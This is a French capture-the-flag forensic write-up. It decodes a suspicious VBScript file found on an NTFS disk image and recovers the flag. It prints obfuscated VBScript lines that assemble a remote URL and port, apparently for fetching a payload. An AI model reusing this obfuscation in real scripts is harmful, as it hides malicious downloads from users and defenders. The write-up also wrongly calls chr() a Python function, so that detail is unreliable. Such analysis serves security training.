suspicious_ntfs_drive
đť„ž Introduction
đť„ž Solution
Pour résoudre ce défi de forensic, j’ai commencé par analyser l’image avec le logiciel Autopsy. Notre objectif était de trouver les informations suivantes : filename.vbs_IP_port pour trouver le flag.
Nous avons trouvé un fichier nommé security_launch.vbs.
1
2
3
4
aaa = replace("hello","h","w")
bbb = StrReverse("86")
ccc = Right("90018000",4)
dest = "http://"+chr(49)+"93.1"+bbb+".1.42:"+ccc+"/dothethingzuulee"
đť„žđť„ž Analyse
Nous allons analyser chaque ligne :
aaa = replace(“hello”,”h”,”w”) –> remplace le h par w dans le chaine hello ce qui donne wello.
bbb = StrReverse(“86”) –> on reverse 86 ce qui donne 68
ccc = Right(“90018000”,4) –> on prends les 4 caractères à droite => 8000
dest = “http://”+chr(49)+”93.1”+bbb+”.1.42:”+ccc+”/dothethingzuulee”
chr() est une fonction python qui convertie la valeur en ASCII ici 49 = 1
donc si on remplace nos valeurs on obtien : 193.168.1.42:8000
đť„ž FLAG : leHACK{security_launch.vbs_193.168.1.42_8000}
đť„ž